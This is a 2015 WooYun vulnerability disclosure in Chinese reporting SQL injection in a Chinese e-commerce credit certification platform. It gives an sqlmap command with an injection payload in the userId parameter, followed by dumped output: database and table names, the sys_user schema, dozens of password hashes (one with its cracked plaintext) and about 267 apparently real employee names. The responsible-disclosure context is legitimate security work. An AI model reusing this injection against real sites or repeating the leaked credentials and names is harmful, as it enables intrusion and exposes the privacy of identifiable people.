当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145020

漏洞标题:中国电子商务信用认证平台SQL注射/大量信息泄露

相关厂商:中国电子商务信用认证平台

漏洞作者: 冷白开。

提交时间:2015-10-06 15:48

修复时间:2015-11-26 10:56

公开时间:2015-11-26 10:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-06: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

中国电子商务信用认证平台SQL注射/大量信息泄露

详细说明:

射点sqlmap.py -u "https://**.**.**.**//entry.php?action=getUserinfo2&userId=1%20AND%203*2*1%3d6%20AND%20204%3d204" --dbs

1.png

影响19个库

available databases [19]:
[*] accesslog
[*] company
[*] cxt
[*] cxt_cert
[*] dede53
[*] information_schema
[*] joyinweb
[*] mysql
[*] performance_schema
[*] phpcms
[*] phpmyvisites
[*] piwik
[*] rdfocus
[*] szfw2
[*] szfw2_call
[*] test
[*] textpattern
[*] tikiwiki
[*] typecho
Database: szfw2
[140 tables]
+---------------------------------------+
| agent_map |
| am_agent |
| am_agent_contact |
| am_agent_in_out_sea_his |
| am_agent_log |
| am_agent_move |
| am_agent_pact |
| am_agent_permit |
| am_agent_share |
| am_agent_share_checklog |
| am_agent_source |
| am_agentcheck_log |
| am_agentpact_checklog |
| am_expect_charge |
| am_expect_charge_history |
| am_last_contact |
| am_pact_cashdeposit |
| am_pact_translog |
| am_quarterly_task |
| am_visit_acc_check |
| am_visit_acc_return |
| am_visit_accompany |
| am_visit_appoint |
| am_visit_note |
| am_visit_return |
| am_visit_vertify |
| am_visit_vertify_item |
| cert_company |
| cert_domain |
| cert_license |
| cm_ag_contact |
| cm_ag_contact_recode |
| cm_customer |
| cm_customer_agent |
| cm_customer_ex |
| cm_customer_log |
| cm_customer_move |
| cm_customer_permit |
| cm_data_config |
| cm_intention |
| cm_user_move |
| com_audit_record |
| com_bill_no |
| drp_wm_customer |
| fm_account_detail_rp |
| fm_account_recharge |
| fm_agent_account |
| fm_agent_account_amount |
| fm_agent_account_detail |
| fm_agent_bank |
| fm_attachments |
| fm_bank_account |
| fm_invoice_bill |
| fm_invoice_isseu |
| fm_invoice_isseu_bill |
| fm_invoice_no |
| fm_invoice_type |
| fm_post_money |
| fm_receipt_payment_mode |
| fm_receivable_pay |
| fm_receivable_pay_state |
| fm_unit_out_money |
| hr_abpost |
| hr_department |
| hr_dept_position |
| hr_e_position |
| hr_employee |
| hr_employee_old |
| hr_level |
| hr_position |
| hr_postion_level |
| log_login |
| log_operate |
| log_webservice |
| om_order |
| om_order_gift |
| om_order_gift_set |
| om_order_move_log |
| om_order_no |
| om_order_recharge |
| om_order_website |
| rpt_agent_contact_record |
| rpt_agent_intention_rating |
| rpt_kpi_base |
| sys_account_group |
| sys_account_group_user |
| sys_agent_model |
| sys_agent_model_detail |
| sys_agroup_manager |
| sys_agroup_manager_detail |
| sys_area |
| sys_area_group |
| sys_area_group_detail |
| sys_base_data |
| sys_city |
| sys_com_setting |
| sys_const_data |
| sys_data_synchronous |
| sys_dev_auto_code |
| sys_industry |
| sys_intention_rating |
| sys_message |
| sys_model |
| sys_model_group |
| sys_model_right |
| sys_post_right |
| sys_product |
| sys_product_price_model |
| sys_product_type |
| sys_province |
| sys_role |
| sys_role_right |
| sys_send_mail |
| sys_soap_log |
| sys_unit |
| sys_unit_salereward_rate_model |
| sys_unit_salereward_rate_model_detail |
| sys_upload_doc |
| sys_user |
| sys_user_area |
| sys_user_old |
| sys_user_right |
| sys_user_role |
| sys_vacation_days |
| sys_zone |
| temp_111 |
| temp_cert_company |
| tm_eMail |
| tm_net |
| tm_net_account |
| tm_net_model_manage_user |
| tm_net_model_manage_user_history |
| tm_net_verify |
| tm_single_info |
| tm_trustworthy |
| v_am_agent_pact_product |
| v_am_effect_pact_product |
| v_channel_manager_area |
| v_hr_abpost |
| v_hr_employee |
+---------------------------------------+
Database: szfw2
Table: sys_user
[23 columns]
+-----------------+---------------------+
| Column | Type |
+-----------------+---------------------+
| agent_id | int(5) unsigned |
| create_time | timestamp |
| create_uid | int(11) unsigned |
| dept_name | varchar(16) |
| e_name | varchar(8) |
| e_uid | int(8) unsigned |
| finance_no | varchar(64) |
| finance_uid | int(11) unsigned |
| is_del | tinyint(3) unsigned |
| is_finance | tinyint(4) |
| is_lock | int(3) unsigned |
| last_login_time | datetime |
| login_count | int(11) unsigned |
| phone | varchar(20) |
| sort_index | int(11) |
| tel | varchar(20) |
| update_time | timestamp |
| update_uid | int(11) unsigned |
| user_id | int(11) unsigned |
| user_name | varchar(16) |
| user_no | varchar(48) |
| user_pwd | varchar(64) |
| user_remark | varchar(256) |
+-----------------+---------------------+
Database: szfw2
Table: sys_user
[58 entries]
+----------------------------------+
| user_pwd |
+----------------------------------+
| 0009A9BD7AC397B4A311EAD4280E5C74 |明文:zhouhua
| 001772FBA101EB45699B34F03F57694C |
| 0022671AC060C0E6682B2F91B8332BB9 |
| 00284A6D3ED73DC8D226D53467C1248E |
| 00291AEFD7117592F0858EC119136E60 |
| 00370D5A171DEB215D9C8B1FB51BC130 |
| 004B9B7AC4FC8B9E0412CCA0C9305C46 |
| 004D0A8147789FBDED427352260365C3 |
| 004D8391474EE20E05976A7BFFF1BAFE |
| 004DD1C9C616039C351C94AA7603B8CA |
| 0058AEA7FC8247B394E1C19FCAF05A36 |
| 005B6C065A2D4E4E15F5E8D195553336 |
| 0060CF811B2F26E664DF11352836D521 |
| 0062D21C1A97ACAD0FFF653DF56849B2 |
| 0067E0C6A7736FF2FEB5401C50E40055 |
| 0073F7639030624D23BAA08FA246A49C |
| 0078F94B32371DF125EF18CB4686E01D |
| 008B3B2FCDDBA8455DAD8B3A1B3079B4 |
| 008DBC66A01002D68888DE7B69438955 |
| 009AA9774B5CF730A880956FE6CAAB23 |
| 009B927906B97D1507451F45D795D55E |
| 009B927906B97D1507451F45D795D55E |
| 00A0C18D686BF8C2A0378DA16CCF7B97 |
| 00AA1DFAEB695A7AFA25F4E91EF5F3E7 |
| 00ACA552FD08D98306DB09566C88CF85 |
| 00B66944EEB6E8342A7085AB0B98AB96 |
| 00B89B8EB20AB3009960B8C05F2363AE |
| 00BCB1F530E3FE3F0C46DB712C09312D |
| 00C222E0437A1EFF39FF1B0C27D51953 |
| 00C5745BDF12D4C9C8714D53D5EB4053 |
| 00CF27E392AC1DA17A2A44B2B89AD8B3 |
| 00D38EF89D410F5FEBFB23DDE1D4E6F3 |
| 00DCBE5FADCC2A232E2F68DEDC42ABFB |
| 00DD223C028CEE28C5EF7F82004F4C0F |
| 00E155244F2829C4D08FE62CDC039B50 |
| 00E3170230703BE5AC1CEBC30291723A |
| 00E69BA9AC98F67595DA7AA6C02244D6 |
| 00EDE0A6C4D967AB8EE0E46C8809CC0E |
| 00F398C18CEA1911F58696E43CF85A47 |
| 00F39DCDE9CF1E731344520AB9D2DBA7 |
| 00F65D2EA75BEC0A987CFF849342BF82 |
| 00FEF253C6E3BDE1D3F16C6882760392 |
| 00FF50D1FEDEE1BCDDAFCD96ABC28489 |
| 010394E55922E7D5CF3B2A5585B06AFB |
| 0108CF8B0D9F6FBE9F63BD44766EA313 |
| 010A11C2A6691F8BE77F6519295D20DB |
| 011FE5DB205CD7CF21144AE329A949D3 |
| 01224DAF6A9E29FCEFF81668F4AC589E |
| 0123CADA84714B1273415029FC778C3B |
| 012A0DF605EDC90B7BFB75FFB55F6103 |
| 0138C595E85D5BA9951D9993517FEAB3 |
| 013C9F7DE65AD0C26922D864742F3A7C |
| 01438E10ABB1EA0E7B5514A2E61C2191 |
| 0143B99B04C05979106439B4D4397E8D |
| 01465D7F7019EC7D654997001678AD2A |
| 0146F74685E3EF63992126EB50A44A7D |
| 014D389D1CC652B37FEFA3CADD6D19EF |
| 0156C4B099E489BA4D13DB6BD3EBB2AE |
+----------------------------------+
Database: szfw2
Table: sys_user
[267 entries]
+----------+
| e_name |
+----------+
[13:36:59] [WARNING] console output will be tri
e table size
| pshz0060 |
| test |
| test |
| test |
| test1 |
| test4 |
| 丁丽珍 |
| 丁于 |
| 丁亚丹 |
| 丁佳伟 |
| 丁兵群 |
| 丁剑波 |
| 丁勇 |
| 丁勰 |
| 丁占英 |
| 丁卫星 |
| 丁垚量 |
| 丁士杰 |
| 丁季多 |
| 丁宁 |
| 丁宏儒 |
| 丁小兵 |
| 丁小波 |
| 丁少远 |
| 丁幸 |
| 丁建强 |
| 丁建潮 |
| 丁彩 |
| 丁怡 |
| 丁慧丽 |
| 丁敏兰 |
| 丁新蕾 |
| 丁旭兰 |
| 丁晓慧 |
| 丁晓飞 |
| 丁柳 |
| 丁柳 |
| 丁根良 |
| 丁梦岚 |
| 丁泽龙 |
| 丁海燕 |
| 丁涛 |
| 丁涛涛 |
| 丁潇潇 |
| 丁玉兰 |
| 丁玉珍 |
| 丁珊珊 |
| 丁碧霞 |
| 丁磊 |
| 丁莉萍 |
| 丁莹 |
| 丁菊 |
| 丁蓉蓉 |
| 丁蕊 |
| 丁超 |
| 丁超颖 |
| 丁达坤 |
| 丁鑫 |
| 丁钱杰 |
| 丁银萍 |
| 丁银银 |
| 丁锟 |
| 丁雨平 |
| 丁颖 |
| 丁颖 |
| 丁飞云 |
| 丁魁 |
| 丁鼎 |
| 万东辉 |
| 万东辉 |
| 万云 |
| 万亚琴 |
| 万佳玲 |
| 万光胜 |
| 万分标 |
| 万勇 |
| 万嘉东 |
| 万娟 |
| 万婷婷 |
| 万平 |
| 万志强 |
| 万忠坤 |
| 万振国 |
| 万敏 |
| 万文婷 |
| 万明佳 |
| 万明辉 |
| 万昱 |
| 万晓寅 |
| 万源 |
| 万玉婷 |
| 万琴 |
| 万真 |
| 万秀东 |
| 万科 |
| 万英宏 |
| 万蓉 |
| 万辉 |
| 万通 |
| 三部管理 |
| 上官建行 |
| 上官艳艳 |
| 丛珊 |
| 东智勇 |
| 严一飞 |
| 严东红 |
| 严丽萍 |
| 严云良 |
| 严伟 |
| 严伟惠 |
| 严佳梦 |
| 严加武 |
| 严勇 |
| 严厚辉 |
| 严叶超 |
| 严国梅 |
| 严国梅 |
| 严坷娣 |
| 严娟娟 |
| 严婕 |
| 严嵩 |
| 严廷豪 |
| 严德胜 |
| 严志强 |
| 严振 |
| 严攀越 |
| 严文龙 |
| 严新 |
| 严晓斌 |
| 严杭鑫 |
| 严林树 |
| 严林盛 |
| 严梦姣 |
| 严江成 |
| 严浩 |
| 严浩浩 |
| 严渭飞 |
| 严玉和 |
| 严琰 |
| 严瑶琴 |
| 严皓 |
| 严科立 |
| 严绍平 |
| 严聪 |
| 严艳儿 |
| 严莉萍 |
| 严跃明 |
| 严鄂平 |
| 严陈静 |
| 中网互赢 |
| 丰亚雅 |
| 丰娟 |
| 丰瑜晴 |
| 丰财 |
| 义乌打印 |
| 乐丽霞 |
| 乐容容 |
| 乐朝阳 |
| 乐淘 |
| 乐玲娜 |
| 乐秋露 |
| 乐超超 |
| 乔南 |
| 乔姗姗 |
| 乔明明 |
| 乔朋 |
| 乔蒙蒙 |
| 乔通卫 |
| 于军海 |
| 于军海 |
| 于利平 |
| 于博 |
| 于婷 |
| 于建军 |
| 于彩虹 |
| 于彬彬 |
| 于振伟 |
| 于敏茜 |
| 于明坤 |
| 于春福 |
| 于春福 |
| 于春艳 |
| 于梦佳 |
| 于欢欢 |
| 于泉 |
| 于洋 |
| 于琦 |
| 于琼伟 |
| 于疆 |
| 于继纲 |
| 于若木 |
| 于萍 |
| 于金霞 |
| 于雪 |
| 于静 |
| 云占锋 |
| 云建新 |
| 亓鑫 |
| 井厚飞 |
| 井睆珊 |
| 井茹 |
| 亢永灿 |
| 仇义娜 |
| 仇志华 |
| 付世龙 |
| 付云云 |
| 付佳倩 |
| 付倩 |
| 付勇 |
| 付勇1 |
| 付博 |
| 付姗姗 |
| 付媛媛 |
| 付小红 |
| 付庆洋 |
| 付徐涛 |
| 付志文 |
| 付恩颂 |
| 付文强 |
| 付文文 |
| 付斌斌 |
| 付晓丽 |
| 付晓廉 |
| 付梅 |
| 付清科 |
| 付爱春 |
| 付玲慧 |
| 付珊珊 |
| 付祎 |
| 付胤 |
| 付芳 |
| 付闪宾 |
| 仝丹丹 |
| 仝琳 |
| 代凤海 |
| 代剑锋 |
| 代婷婷 |
| 代子慧 |
| 代富如 |
| 代晓军 |
| 代晴晴 |
| 代森 |
| 代淑姣 |
| 代玉 |
| 代瑶 |
| 代立龙 |
| 代艳丽 |
| 代路伟 |
| 代路英 |
| 代金苹 |
| 代金苹 |
| 代长均 |
| 代长均 |
| 仰敏 |
| 仲夏斌 |
| 仵州 |
+----------+

很多我都没跑完,因为sqlmap装不下了。。。。。几张过程图贴一下

2.png

有几个电话号码

4.png

一坨密码。。。看着都头晕

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-12 10:54

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无